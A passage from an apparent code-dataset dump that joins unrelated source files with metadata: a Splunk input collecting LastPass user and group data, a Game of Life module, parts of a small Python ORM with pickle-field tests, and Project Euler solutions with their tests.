PAGE_SIZE = 2000
PAGE_INDEX = 0
'''
IMPORTANT
Edit only the validate_input and collect_events functions.
Do not edit any other part in this file.
This file is generated only once when creating the modular input.
'''
'''
# For advanced users, if you want to create single instance mod input, uncomment this method.
def use_single_instance_mode():
return True
'''
def validate_input(helper, definition):
"""Implement your own validation logic to validate the input stanza configurations"""
# This example accesses the modular input variable
# lastpass_api_url = definition.parameters.get('lastpass_api_url', None)
# time_start = definition.parameters.get('time_start', None)
url = definition.parameters.get('lastpass_api_url', None)
if 'https://' in url:
return
# replace if http but not https
elif 'http' in url and 'https://' not in url:
raise ValueError('"HTTP" protocol not allowed. Please update for HTTPS.')
elif '.' not in url:
raise ValueError('URL submission invalid. Please validate domain.')
elif 'https://' not in url:
# add proper url
definition.parameters['lastpass_api_url'] = 'https://'+url
def save_checkpoint(helper, index_users, index_groups):
'''
update checkpoint with index values for both user and group lists
@param index_users: page index for users
@param index_groups: page index for groups
    @type index_users: int
    @type index_groups: int
'''
try:
if isinstance(index_users, int) and isinstance(index_groups, int):
state_payload = {}
state_payload['idx_user'] = index_users
state_payload['idx_group'] = index_groups
helper.save_check_point(LP_CHECKPOINT_KEY, state_payload)
else:
raise Exception(f'Invalid index key types for checkpointing LastPass user input: user_index={index_users} group_index={index_groups}')
except Exception as e:
raise IOError(f'Save LastPass user checkpoint failed. user_index={index_users} group_index={index_groups} reason="{e}"')
def get_checkpoint(helper):
'''
extract checkpoint index value
:return: index value or None
'''
# if checkpoint corrupted or not readable, consider empty
try:
state_payload = helper.get_check_point(LP_CHECKPOINT_KEY)
except Exception as e:
        helper.log_warning(f'Loading checkpoint. Unable to load checkpoint. reason="{e}"')
return None
if isinstance(state_payload, dict):
return state_payload
helper.log_warning(f'Loading checkpoint. Invalid index key types for LastPass user input. checkpoint_payload="{repr(state_payload)}"')
return None
def collect_events(helper, ew):
"""Implement your data collection logic here
# The following examples get the arguments of this input.
# Note, for single instance mod input, args will be returned as a dict.
# For multi instance mod input, args will be returned as a single value.
opt_text = helper.get_arg('text')
opt_text_1 = helper.get_arg('text_1')
# In single instance mode, to get arguments of a particular input, use
opt_text = helper.get_arg('text', stanza_name)
opt_text_1 = helper.get_arg('text_1', stanza_name)
# get input type
helper.get_input_type()
# The following examples get input stanzas.
# get all detailed input stanzas
helper.get_input_stanza()
# get specific input stanza with stanza name
helper.get_input_stanza(stanza_name)
# get all stanza names
helper.get_input_stanza_names()
# The following examples get options from setup page configuration.
# get the loglevel from the setup page
loglevel = helper.get_log_level()
# get proxy setting configuration
proxy_settings = helper.get_proxy()
# get account credentials as dictionary
account = helper.get_user_credential_by_username("username")
account = helper.get_user_credential_by_id("account id")
# get global variable configuration
global_cid = helper.get_global_setting("cid")
global_provhash = helper.get_global_setting("provhash")
# The following examples show usage of logging related helper functions.
# write to the log for this modular input using configured global log level or INFO as default
helper.log("log message")
# write to the log using specified log level
helper.log_debug("log message")
helper.log_info("log message")
helper.log_warning("log message")
helper.log_error("log message")
helper.log_critical("log message")
# set the log level for this modular input
# (log_level can be "debug", "info", "warning", "error" or "critical", case insensitive)
helper.set_log_level(log_level)
# The following examples send rest requests to some endpoint.
response = helper.send_http_request(url, method, parameters=None, payload=None,
headers=None, cookies=None, verify=True, cert=None,
timeout=None, use_proxy=True)
# get the response headers
r_headers = response.headers
# get the response body as text
r_text = response.text
# get response body as json. If the body text is not a json string, raise a ValueError
r_json = response.json()
# get response cookies
r_cookies = response.cookies
# get redirect history
historical_responses = response.history
# get response status code
r_status = response.status_code
    # check the response status, if the status is not successful, raise requests.HTTPError
response.raise_for_status()
# The following examples show usage of check pointing related helper functions.
# save checkpoint
helper.save_check_point(key, state)
# delete checkpoint
helper.delete_check_point(key)
# get checkpoint
state = helper.get_check_point(key)
# To create a splunk event
helper.new_event(data, time=None, host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)
"""
'''
# The following example writes a random number as an event. (Multi Instance Mode)
# Use this code template by default.
import random
data = str(random.randint(0,100))
event = helper.new_event(source=helper.get_input_type(), index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), data=data)
ew.write_event(event)
'''
'''
# The following example writes a random number as an event for each input config. (Single Instance Mode)
# For advanced users, if you want to create single instance mod input, please use this code template.
# Also, you need to uncomment use_single_instance_mode() above.
import random
input_type = helper.get_input_type()
for stanza_name in helper.get_input_stanza_names():
data = str(random.randint(0,100))
event = helper.new_event(source=input_type, index=helper.get_output_index(stanza_name), sourcetype=helper.get_sourcetype(stanza_name), data=data)
ew.write_event(event)
'''
global PAGE_INDEX
rest_url = helper.get_arg('lastpass_api_url')
if not rest_url:
rest_url = 'https://lastpass.com/enterpriseapi.php'
# pre-fix domain to proper URL
elif 'https://' not in rest_url:
rest_url = f'https://{rest_url}'
helper.log_debug(f'LastPass parameter check: rest_url={rest_url}')
headers = { 'Content-Type': 'application/json' }
# build data params
data = {}
data['cid'] = helper.get_global_setting('cid')
data['provhash'] = helper.get_global_setting('provhash')
data['cmd'] = CMD_KEY
data['apiuser'] = 'splunk.collector'
''' algorithm w checkpointing:
if results are larger than max page size, checkpoint page index
'''
chk_user = 0
while True:
data['data'] = { 'pagesize': PAGE_SIZE, 'pageindex': PAGE_INDEX }
try:
helper.log_debug(f'LastPass identity collection. Collecting user identities. page_index={PAGE_INDEX}')
resp_ev = requests.post(rest_url, headers=headers, data=json.dumps(data))
if resp_ev.status_code != 200:
helper.log_critical(f'LastPass identity collection. request data failed.')
elif re.search(r"(Authorization Error)", resp_ev.text):
helper.log_exception(f'LastPass identity collection. request data failed. 401: Unauthorized. Verify cid/provhash.')
resp_ev_json = resp_ev.json()
# track for malformed REST call
if resp_ev_json.get('status') and 'OK' not in resp_ev_json.get('status'):
helper.log_critical(f'Lastpass identity collection. REST call successful, but query is bad. Validate request params. Terminating script')
#helper.log_debug(f'Lastpass identity collection. Failed request: {data}')
return
#sys.exit(1)
except Exception as e:
raise e
total = resp_ev_json.get('total')
count = resp_ev_json.get('count')
helper.log_debug(f'LastPass identity collection. total_identities={total} current_count={count}')
# track all identities
users = {}
groups = {}
chk_group = 0
chk_invited = False
time_val = datetime.datetime.now().timestamp()
try:
for idx_user, user in enumerate(resp_ev_json.get('Users')):
users[user] = copy.deepcopy(resp_ev_json.get('Users')[user])
users[user]['user_id'] = user
users[user]['time_collected'] = time_val
users[user]['event'] = 'list_users'
chk_user += 1
if chk_user % 250 == 0:
time_val = datetime.datetime.now().timestamp()
# attrib field cleanup
if users[user].get('attribs'):
# detect and render if name is JSON
if users[user].get('attribs').get('name'):
try:
test = json.loads(users[user].get('attribs').get('name'))
users[user].get('attribs').update({'name': test})
# do not change if not a JSON value
except:
pass
# scrub password values from attribs
if users[user].get('attribs').get('password'):
users[user].get('attribs').update({'password': hashlib.sha1(users[user].get('attribs').get('password').encode()).hexdigest()})
event = helper.new_event(data=json.dumps(users[user]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype=helper.get_sourcetype())
ew.write_event(event)
iter_group = resp_ev_json.get('Groups') if resp_ev_json.get('Groups') else {}
for idx_group, group in enumerate(iter_group):
groups[group] = {}
groups[group]['members'] = copy.deepcopy(resp_ev_json.get('Groups')[group])
groups[group]['count'] = len(resp_ev_json.get('Groups')[group])
groups[group]['group_id'] = group
groups[group]['time_collected'] = time_val
groups[group]['event'] = 'list_groups'
chk_group = idx_group
if idx_group % 10 == 0:
time_val = datetime.datetime.now().timestamp()
# can only specify one sourcetype per input, hardcode for groups
event = helper.new_event(data=json.dumps(groups[group]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype='lastpass:groups')
ew.write_event(event)
if resp_ev_json.get('invited') and not chk_invited:
invited = {}
invited['members'] = copy.deepcopy(resp_ev_json.get('invited'))
invited['count'] = len(resp_ev_json.get('invited'))
invited['time_collected'] = time_val
invited['event'] = 'list_invited'
# can only specify one sourcetype per input, hardcode for groups
event = helper.new_event(data=json.dumps(invited),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype='lastpass:invited')
ew.write_event(event)
chk_invited = True
# break out if no more records to processes
if chk_user >= total or count < PAGE_SIZE:
helper.log_debug(f'LastPass identity collection. Reached end of user list: idx_user={chk_user}')
break
# increment page index to capture more user/group identities
PAGE_INDEX += 1
save_checkpoint(helper, chk_user, chk_group)
helper.log_debug(f'LastPass identity collection. Updating LastPass identity checkpoint: idx_user={chk_user} idx_group={chk_group}')
except Exception as e:
helper.log_critical(f'LastPass identity collection. idx_user={chk_user} idx_group={chk_group} Error in forwarding data: {traceback.format_exc()}')
raise e
helper.log_debug(f'LastPass identity collection. Complete: user identity collection. page_index={PAGE_INDEX} total_identities={total} current_count={count}')
```
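The users module above pulls identities page by page: PAGE_SIZE records per request, stopping once the running total is reached or a short page comes back. A minimal sketch of that paging pattern, where `fetch_page` is a hypothetical stand-in for the POST to the LastPass endpoint:
```python
# Sketch of the paging loop used above; `fetch_page` is a hypothetical callable that
# returns one parsed getuserdata response ({'total': ..., 'count': ..., 'Users': {...}}).
PAGE_SIZE = 2000

def iter_users(fetch_page, page_size=PAGE_SIZE):
    page_index, seen = 0, 0
    while True:
        resp = fetch_page(pageindex=page_index, pagesize=page_size)
        users = resp.get('Users', {})
        for user_id, user in users.items():
            yield user_id, user
        seen += resp.get('count', len(users))
        if seen >= resp.get('total', 0) or resp.get('count', 0) < page_size:
            break
        page_index += 1
```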
|
{
"source": "Jexan/GameOfLife",
"score": 3
}
|
#### File: GameOfLife/src/func.py
```python
import game
import copy
import random
# Updates the location of cells and the generation
def update(dt):
if game.pause:
return
eliminate_adjacent()
game.generation += 1
game.generation_label.text = str(game.generation)
# Creates random cells at the start of the game
def randomize_board():
for i in range(game.random_cells):
game.board[random.randint(0,game.grid_count - 1)][random.randint(0,game.grid_count - 1)] = 1
# Blits the cells
def draw_board():
for index_y,y in enumerate(game.board):
for index_x,x in enumerate(y):
if x:
game.on.blit(index_x*game.tile_size, index_y*game.tile_size)
else:
game.off.blit(index_x*game.tile_size, index_y*game.tile_size)
# Checks if a cell lives or dies; N = North...
def eliminate_adjacent():
    board_copy = copy.deepcopy(game.board)
    for index_y,y in enumerate(game.board):
        for index_x,x in enumerate(y):
            neighboors = 0
            if index_x < game.limit:
                neighboors += game.board[index_y][index_x + 1] # E
            if index_x != 0:
                neighboors += game.board[index_y][index_x - 1] # W
            if index_y != 0:
                neighboors += game.board[index_y - 1][index_x] # N
                if index_x < game.limit:
                    neighboors += game.board[index_y - 1][index_x + 1] # NE
                if index_x != 0:
                    neighboors += game.board[index_y - 1][index_x - 1] # NW
            if index_y < game.limit:
                neighboors += game.board[index_y + 1][index_x] # S
                if index_x < game.limit:
                    neighboors += game.board[index_y + 1][index_x + 1] # SE
                if index_x != 0:
                    neighboors += game.board[index_y + 1][index_x - 1] # SW
            # Conway rules: a dead cell is born with exactly 3 neighbours,
            # a live cell survives with 2 or 3 neighbours
            if x == 0:
                if neighboors == 3:
                    board_copy[index_y][index_x] = 1
            elif x == 1 and neighboors not in (2, 3):
                board_copy[index_y][index_x] = 0
    game.board = board_copy
# Used for the restart too; 1 means a live cell, 0, a dead one
def start():
game.board = [[0 for y in range(game.grid_count)] for i in range(game.grid_count)]
game.limit = len(game.board) - 1
randomize_board()
game.generation = 0
game.generation_label.text = "0"
```
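As a quick check of the rules used in `eliminate_adjacent` (birth on exactly 3 neighbours, survival on 2 or 3), here is a self-contained step function over a plain list-of-lists board with no `game` module; a blinker should oscillate with period 2.
```python
# Self-contained sketch of one Conway step on a bounded square grid (no wrap-around).
def step(board):
    size = len(board)
    nxt = [row[:] for row in board]
    for y in range(size):
        for x in range(size):
            n = sum(board[y + dy][x + dx]
                    for dy in (-1, 0, 1) for dx in (-1, 0, 1)
                    if (dy or dx) and 0 <= y + dy < size and 0 <= x + dx < size)
            nxt[y][x] = 1 if n == 3 or (board[y][x] and n == 2) else 0
    return nxt

blinker = [[0, 0, 0, 0, 0],
           [0, 0, 1, 0, 0],
           [0, 0, 1, 0, 0],
           [0, 0, 1, 0, 0],
           [0, 0, 0, 0, 0]]
assert step(step(blinker)) == blinker   # period-2 oscillator
```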
|
{
"source": "Jexan/OxygenRM",
"score": 2
}
|
#### File: OxygenRM/OxygenRM/__init__.py
```python
from OxygenRM.internals.SQLite3DB import *
internal_db = None
db = None
handle_events = False
emit_warnings = True
# Defines the database driver
def db_config(driver, db_name):
global internal_db, db
if driver == 'sqlite3':
internal_db = SQLite3DB(db_name)
db = internal_db
return internal_db
# Sets the database to a set database driver
def db_set():
pass
def transaction():
if not db:
raise RuntimeError('Cannot start a transaction with an unspecified database.')
else:
return db.transaction()
def use_events():
global handle_events
handle_events = True
def cancel_events():
global handle_events
handle_events = False
def warn(msg):
""" Print a warning, if they're enabled.
"""
if not emit_warnings:
return
else:
        print(f'OxygenRM warning: {msg}')
```
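A short, hypothetical usage sketch for the module above; 'app.db' is an invented file name and the transaction object's API is defined elsewhere, so only the calls shown in this file are illustrated.
```python
# Hypothetical usage; 'app.db' is a made-up database file.
import OxygenRM as O

O.db_config('sqlite3', 'app.db')   # selects the SQLite3 driver and assigns O.db
O.use_events()                     # flip the module-level event flag
tx = O.transaction()               # raises RuntimeError if db_config() was never called
```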
#### File: OxygenRM/OxygenRM/pivot.py
```python
from OxygenRM.internals.QueryBuilder import QueryBuilder
from OxygenRM.internals.fields import Field, Relation
from OxygenRM.models import Model
import OxygenRM as O
class Pivot(Model):
""" The model class for ManyToMany middle table classes
"""
@classmethod
def _set_up_model(cls):
""" Set up the internals and relations of the Model
"""
cls._fields = dict()
cls._rel_queue = list()
cls._pivot_classes = dict()
for attr, value in cls.__dict__.items():
if isinstance(value, Field):
value._attr = attr
row_prop = property(fget=value.get, fset=value.set)
setattr(cls, attr, row_prop)
cls._fields[attr] = value
cls._set_up = True
def save(self, base_model=None):
values_for_db = {}
# The ids of the related models
self_id = getattr(self, self._self_name, None)
other_id = getattr(self, self._other_name, None)
if self_id is None or other_id is None:
raise ValueError('Cannot save pivot model if relation ids are None: {}:{} and {}:{}'.format(
self._self_name, self_id, self._other_name, other_id
))
if base_model == None:
for field_name, field_instance in self._fields.items():
values_for_db[field_name] = field_instance.db_set(self, self._field_values[field_name])
if self._creating_new:
O.db.create(self.table_name, **values_for_db)
def _update_values(self, values):
self._field_values = {}
for field, col in self._fields.items():
field_val = values.get(field, None)
self._field_values[field] = col.db_get(field_val)
@classmethod
def new(cls):
return cls()
def set_self_id(self, id):
""" Set the id of the initial model id for this row. (Useful for new model creation)
Args:
id: The value of the inital model id.
"""
setattr(self, self._self_name, id)
```
#### File: test/internals_test/test_columns.py
```python
import unittest
from OxygenRM.internals.columns import *
class T():
t = Text()
b = Bool()
i = Integer()
f = Float()
id = Id()
class TestColumns(unittest.TestCase):
def test_all_columns_classes_initialize(self):
""" Assure the columns classes constructor work
"""
t = Text()
b = Bool()
i = Integer()
f = Float()
i_d = Id()
self.assertIsInstance(t, Text)
self.assertIsInstance(b, Bool)
self.assertIsInstance(i, Integer)
self.assertIsInstance(f, Float)
self.assertIsInstance(i_d, Id)
```
#### File: test/model_tests/test_pickle_column.py
```python
from . import *
import pickle
class PickleModel(O.Model):
a = Pickle()
b = Pickle(list, strict=True)
c = Pickle(int)
d = Pickle(dict, ({'t': 1},))
class TestJSONFields(unittest.TestCase):
def setUp(self):
db.create_table('PickleModels', default_cols(a='blob', b='blob', c='blob', d='blob'))
def tearDown(self):
db.drop_table('PickleModels')
def test_model_initialization(self):
t1 = PickleModel()
self.assertIs(t1.a, None)
self.assertIsInstance(t1.b, list)
self.assertIsInstance(t1.c, int)
self.assertIsInstance(t1.d, dict)
self.assertEqual(t1.b, [])
self.assertEqual(t1.c, 0)
self.assertEqual(t1.d, {'t': 1})
def test_model_strict_changing_raises_TypeError(self):
t1 = PickleModel()
with self.assertRaises(TypeError):
t1.b = 42
def test_model_setting(self):
t1 = PickleModel()
t1.a = None
t1.c = 2.3
t1.d = False
self.assertEqual(t1.a, None)
self.assertEqual(t1.c, 2.3)
self.assertEqual(t1.d, False)
def test_saving_pickle_defaults(self):
t1 = PickleModel()
t1.save()
result = QueryBuilder.table('PickleModels').first()
self.assertEqual(result['a'], pickle.dumps(t1.a))
self.assertEqual(result['b'], pickle.dumps(t1.b))
self.assertEqual(result['c'], pickle.dumps(t1.c))
self.assertEqual(result['d'], pickle.dumps(t1.d))
    def test_getting_loaded_pickle(self):
t1 = PickleModel()
t1.save()
first = PickleModel.first()
self.assertEqual(first.a, None)
self.assertEqual(first.b, [])
self.assertEqual(first.d, {'t': 1})
def test_setting_pure_bytes(self):
t1 = PickleModel()
t1.a = pickle.dumps([1,2,3])
t1.save()
result = QueryBuilder.table('PickleModels').first()
self.assertEqual(result['a'], pickle.dumps([1,2,3]))
```
|
{
"source": "Jexan/ProjectEulerSolutions",
"score": 3
}
|
#### File: ProjectEulerSolutions/src/E002.py
```python
from .helpers import generate_fibonacci
LIMIT = 4000000
def sum_even_fibb_until(limit):
def mini_gen():
for n in generate_fibonacci():
if n >= limit:
return
if not n % 2:
yield n
return sum(mini_gen())
result = sum_even_fibb_until(LIMIT)
```
#### File: ProjectEulerSolutions/src/E007.py
```python
from .helpers import generate_primes
from itertools import islice
DUMMY_NTH = 6
DUMMY_RESULT = 13
NTH = 10001
def get_nth_prime(n):
return next(islice(generate_primes(), n-1, None))
assert get_nth_prime(DUMMY_NTH) == DUMMY_RESULT
result = get_nth_prime(NTH)
```
#### File: ProjectEulerSolutions/src/E009.py
```python
from math import gcd
LIMIT = 1000
def find_pythagorean_triple():
for a in range(1, 11):
for b in range(1, a):
if gcd(a, b) != 1 or (a % 2 and b % 2):
continue
perimeter = 2*(a**2 + a*b)
if perimeter > LIMIT: break
times = LIMIT // perimeter
for i in range(1, times+1):
if perimeter*i == LIMIT:
return i**3*(a**2-b**2)*(2*a*b)*(a**2+b**2)
result = find_pythagorean_triple()
```
#### File: ProjectEulerSolutions/src/E016.py
```python
DUMMY_EXPONENT = 15
DUMMY_RESULT = 26
EXPONENT = 1000
def sum_digits_n_power_of_2(exponent):
return sum(int(digit) for digit in str(2**exponent))
assert sum_digits_n_power_of_2(DUMMY_EXPONENT) == DUMMY_RESULT
result = sum_digits_n_power_of_2(EXPONENT)
```
#### File: ProjectEulerSolutions/src/E041.py
```python
from .helpers import primes_until
from itertools import permutations
from math import floor
limit = floor(987654321 ** .5)
primes = tuple(primes_until(limit))[3:]
def transform_to_num(t):
return int(''.join(t))
def is_prime(n):
if not n % 3:
return False
bound = floor(n**.5)
for p in primes:
if p > bound:
return True
elif not n % p:
return False
def get_result():
for n in range(9, 3, -1):
for i in permutations(str(s) for s in range(n, 0, -1)):
if i[-1] in '24685': continue
if is_prime(transform_to_num(i)):
return transform_to_num(i)
result = get_result()
```
#### File: ProjectEulerSolutions/src/E044.py
```python
from itertools import count
from math import sqrt, modf, inf
from .helpers import take
def generate_pent():
result = 1
for i in count(1):
yield result
result += 3*i + 1
def is_pent(n):
fractional, integer = modf(sqrt(1+24*n))
return fractional == 0 and not (integer + 1) % 6
def get_min_diff():
pents = set()
possible = set()
minimal = inf
last_pent = 0
for pent in generate_pent():
to_remove = set()
for i in pents:
subs = pent - i
if subs < minimal and subs in pents and is_pent(pent + i):
result = subs
minimal = subs
elif subs > minimal:
to_remove.add(i)
if minimal < pent - last_pent:
return result
pents.add(pent)
pents -= to_remove
last_pent = pent
result = get_min_diff()
```
#### File: ProjectEulerSolutions/src/E045.py
```python
from itertools import count
DUMMY_INIT = 140
DUMMY_RESULT = 40755
INIT = 144
def pentagonal_index(triangular):
return (1 + (1 + 12 * triangular * (triangular + 1))**.5) / 6
def triangular_index(hexagonal):
return (-1 + (1 + 8 * hexagonal * (2 * hexagonal - 1))**.5) / 2
def pentagonal(n):
return n*(3*n-1)/2
def generate_numbers_and_find_common(init_in):
for i in count(init_in):
triang = triangular_index(i)
if int(triang) == triang:
pent = pentagonal_index(triang)
if int(pent) == pent:
return pentagonal(int(pent))
assert generate_numbers_and_find_common(DUMMY_INIT) == DUMMY_RESULT
result = generate_numbers_and_find_common(INIT)
```
#### File: ProjectEulerSolutions/src/E049.py
```python
from .helpers import primes_until, find
from itertools import dropwhile, permutations, combinations
def permute_n(n):
return frozenset(int(''.join(per)) for per in permutations(str(n), 4))
def get_criteria_primes():
relevant_primes = tuple(dropwhile(lambda x: x < 1000, primes_until(10000)))
primes_set = set(relevant_primes)
possible = []
for prime in relevant_primes:
if prime not in primes_set:
continue
possible_primes = permute_n(prime) & primes_set
if len(possible_primes) >= 3:
numbers = sorted(possible_primes)
for triplet in combinations(numbers, 3):
if triplet[1] - triplet[0] == triplet[2] - triplet[1]:
possible.append(triplet)
primes_set -= possible_primes
return possible
criteria_primes = get_criteria_primes()
IS_DUMMY_VALUE = lambda b: (lambda x: 1487 in x) if b else (lambda x: 1487 not in x)
assert find(IS_DUMMY_VALUE(True) , criteria_primes)
result = int(''.join(str(i) for i in find(IS_DUMMY_VALUE(False), criteria_primes)))
```
#### File: ProjectEulerSolutions/src/E055.py
```python
from .helpers import is_palindrome
def is_lychrel(n):
current = n
for i in range(50):
result = current + int(str(current)[::-1])
if is_palindrome(result):
return False
current = result
return True
result = len(tuple(filter(is_lychrel, range(1, 10001))))
```
#### File: ProjectEulerSolutions/src/E076.py
```python
from functools import lru_cache
@lru_cache(None)
def reduce_num(to, current=0, max_in_chain=None):
if to == current:
return 1
else:
if not max_in_chain:
max_in_chain = to - 1
total = 0
for i in range(1, min(to-current, max_in_chain) + 1):
total += reduce_num(to, current+i, min(i, max_in_chain))
return total
result = reduce_num(100)
```
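A small hand-checkable case (an addition, not part of the original solution): the partitions of 5 into at least two parts are 4+1, 3+2, 3+1+1, 2+2+1, 2+1+1+1 and 1+1+1+1+1, so the memoized recursion should return 6 for an input of 5.
```python
# Sanity check, assuming reduce_num from the solution above is in scope.
assert reduce_num(5) == 6
```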
#### File: ProjectEulerSolutions/src/E087.py
```python
from .helpers import primes_until
from itertools import takewhile
from math import sqrt, floor
below = 50000000
def get_numbers_quantity():
limit_sq = floor(sqrt(below)) + 1
limit_cr = floor(below**(1/3)) + 1
limit_fr = floor(below**.25) + 1
sieve = tuple(primes_until(limit_sq))
# For some reason if the two last two primes collection is not tuplefied,
# the primes are not going to be yielded correctly.
squared_primes = (i**2 for i in sieve)
cubed_primes = tuple(j**3 for j in takewhile(lambda x: x < limit_cr, sieve))
fourth_primes = tuple(k**4 for k in takewhile(lambda x: x < limit_fr, sieve))
return len(set(filter(lambda x: x < below, (i + j + k for i in squared_primes for j in cubed_primes for k in fourth_primes))))
result = get_numbers_quantity()
```
#### File: ProjectEulerSolutions/src/E092.py
```python
LIMIT = 10000000
arrives_at_1 = {1:True, 89:False}
sum_of_digits = {str(i): i**2 for i in range(10)}
sum_of_digits[''] = 0
def get_digit_sum(n):
str_num = str(n)
last_digits = str_num[1:]
last_sum = sum_of_digits.get(last_digits)
if last_sum is None:
last_sum = get_digit_sum(last_digits)
sum_of_digit = sum_of_digits[str_num[0]] + last_sum
sum_of_digits[sum_of_digit] = sum_of_digit
return sum_of_digit
def n_numbers_who_arrive(limit):
    for i in range(1, limit):
n = i
if not n in arrives_at_1:
to_add = []
to_1 = False
while True:
n = get_digit_sum(n)
if n in arrives_at_1:
to_1 = arrives_at_1[n]
break
else:
to_add.append(n)
arrives_at_1[i] = to_1
for y in to_add:
arrives_at_1[y] = to_1
numbers_who_arrive = filter(lambda x: not arrives_at_1[x], arrives_at_1.keys())
return len(list(numbers_who_arrive))
result = n_numbers_who_arrive(LIMIT)
```
#### File: ProjectEulerSolutions/tests/test_complete_ok.py
```python
import unittest
import subprocess
import os
TESTING_NOW = 4
def get_haskell_output(n):
program = os.path.join(os.getcwd(), 'src', 'E{}'.format(n))
subprocess.run(['ghc', program + '.hs'])
return int(subprocess.check_output(program))
class TestCompleteChallengesYieldCorrectResults(unittest.TestCase):
def test_assure_given_ok(self):
challenge_number = str(TESTING_NOW)
zeroes_padding = '0' * (3 - len(challenge_number))
eval('assure_{}(self)'.format(zeroes_padding + challenge_number))
def assure_001(self):
from src.E001 import result
self.assertEqual(result, 233168)
def assure_002(self):
from src.E002 import result
self.assertEqual(result, 4613732)
def assure_003(self):
from src.E003 import result
self.assertEqual(result, 6857)
def assure_004(self):
from src.E004 import result
self.assertEqual(result, 906609)
def assure_005(self):
from src.E005 import result
self.assertEqual(result, 232792560)
def assure_006(self):
from src.E006 import result
self.assertEqual(result, 25164150)
def assure_007(self):
from src.E007 import result
self.assertEqual(result, 104743)
def assure_008(self):
from src.E008 import result
self.assertEqual(result, 23514624000)
def assure_009(self):
from src.E009 import result
self.assertEqual(result, 31875000)
def assure_010(self):
from src.E010 import result
self.assertEqual(result, 142913828922)
def assure_011(self):
from src.E011 import result
self.assertEqual(result, 70600674)
def assure_012(self):
result = get_haskell_output('012')
self.assertEqual(result, 76576500)
def assure_013(self):
from src.E013 import result
self.assertEqual(result, 5537376230)
def assure_014(self):
from src.E014 import result
self.assertEqual(result, 837799)
def assure_015(self):
from src.E015 import result
self.assertEqual(result, 137846528820)
def assure_016(self):
from src.E016 import result
self.assertEqual(result, 1366)
def assure_017(self):
from src.E017 import result
self.assertEqual(result, 21124)
def assure_018(self):
from src.E018 import result
self.assertEqual(result, 1074)
def assure_019(self):
from src.E019 import result
self.assertEqual(result, 171)
def assure_020(self):
from src.E020 import result
result2 = get_haskell_output('020')
self.assertEqual(result, result2)
self.assertEqual(result, 648)
def assure_021(self):
result = get_haskell_output('021')
self.assertEqual(result, 31626)
def assure_022(self):
from src.E022 import result
self.assertEqual(result, 871198282)
def assure_023(self):
from src.E023 import result
self.assertEqual(result, 4179871)
def assure_024(self):
from src.E024 import result
self.assertEqual(result, 2783915460)
def assure_025(self):
from src.E025 import result
self.assertEqual(result, 4782)
def assure_026(self):
from src.E026 import result
self.assertEqual(result, 983)
def assure_027(self):
from src.E027 import result
result2 = get_haskell_output('027')
self.assertEqual(result, result2)
self.assertEqual(result, -59231)
def assure_028(self):
from src.E028 import result
self.assertEqual(result, 669171001)
def assure_029(self):
from src.E029 import result
self.assertEqual(result, 9183)
def assure_030(self):
from src.E030 import result
        self.assertEqual(result, 443839)
def assure_031(self):
from src.E031 import result
self.assertEqual(result, 73682)
def assure_032(self):
from src.E032 import result
self.assertEqual(result, 45228)
def assure_033(self):
from src.E033 import result
self.assertEqual(result, 100)
def assure_034(self):
from src.E034 import result
self.assertEqual(result, 40730)
def assure_035(self):
result = get_haskell_output('035')
self.assertEqual(result, 55)
def assure_036(self):
from src.E036 import result
self.assertEqual(result, 872187)
def assure_037(self):
from src.E037 import result
self.assertEqual(result, 748317)
def assure_038(self):
from src.E038 import result
self.assertEqual(result, 932718654)
def assure_039(self):
from src.E039 import result
self.assertEqual(result, 840)
def assure_040(self):
        result = get_haskell_output('040')
self.assertEqual(result, 210)
def assure_041(self):
from src.E041 import result
self.assertEqual(result, 7652413)
def assure_042(self):
from src.E042 import result
self.assertEqual(result, 162)
def assure_043(self):
from src.E043 import result
self.assertEqual(result, 16695334890)
def assure_044(self):
from src.E044 import result
self.assertEqual(result, 5482660)
def assure_045(self):
from src.E045 import result
self.assertEqual(result, 1533776805)
def assure_046(self):
from src.E046 import result
self.assertEqual(result, 5777)
def assure_048(self):
from src.E048 import result
self.assertEqual(result, 9110846700)
def assure_049(self):
from src.E049 import result
self.assertEqual(result, 296962999629)
def assure_053(self):
from src.E053 import result
self.assertEqual(result, 4075)
def assure_054(self):
from src.E054 import result
self.assertEqual(result, 376)
def assure_055(self):
from src.E055 import result
self.assertEqual(result, 249)
def assure_056(self):
from src.E056 import result
self.assertEqual(result, 972)
def assure_057(self):
from src.E057 import result
result2 = get_haskell_output('057')
self.assertEqual(result, result2)
self.assertEqual(result, 153)
def assure_061(self):
from src.E061 import result
self.assertEqual(result, 28684)
def assure_063(self):
result = get_haskell_output('063')
self.assertEqual(result, 49)
def assure_065(self):
from src.E065 import result
self.assertEqual(result, 272)
def assure_069(self):
from src.E069 import result
self.assertEqual(result, 510510)
def assure_071(self):
from src.E071 import result
self.assertEqual(result, 428570)
def assure_072(self):
from src.E072 import result
self.assertEqual(result, 303963552391)
def assure_073(self):
from src.E073 import result
self.assertEqual(result, 7295372)
def assure_075(self):
from src.E075 import result
self.assertEqual(result, 161667)
def assure_076(self):
from src.E076 import result
self.assertEqual(result, 190569291)
def assure_087(self):
from src.E087 import result
self.assertEqual(result, 1097343)
def assure_092(self):
from src.E092 import result
self.assertEqual(result, 8581146)
def assure_097(self):
from src.E097 import result
self.assertEqual(result, 8739992577)
```
#### File: ProjectEulerSolutions/tests/test_helpers_methods.py
```python
from src.helpers import *
import unittest
class HelpersTests(unittest.TestCase):
def test_generate_fibonacci(self):
first_fib = (1, 1, 2, 3, 5, 8, 13, 21)
self.assertEqual(tuple(take(8, generate_fibonacci())), first_fib)
def test_primes_until_works_ok(self):
first_primes = (2, 3, 5, 7, 11, 13, 17, 19)
self.assertEqual(tuple(primes_until(20)), first_primes)
def test_is_palindrome(self):
self.assertTrue(is_palindrome(12321))
self.assertTrue(is_palindrome(123321))
self.assertTrue(is_palindrome(11))
self.assertTrue(is_palindrome(12388321))
self.assertFalse(is_palindrome(1234))
self.assertFalse(is_palindrome(-123))
self.assertFalse(is_palindrome(10))
def test_mcm(self):
self.assertEqual(mcm(2, 4, 6), 12)
self.assertEqual(mcm(1, 3), 3)
self.assertEqual(mcm(1, 2, 3, 4, 5), 60)
```
|
{
"source": "jexio/fulmo",
"score": 3
}
|
#### File: fulmo/callbacks/dropout.py
```python
from typing import Dict
import pytorch_lightning as pl
import torch
from .base import BaseCallback
class ScheduledDropoutCallback(BaseCallback):
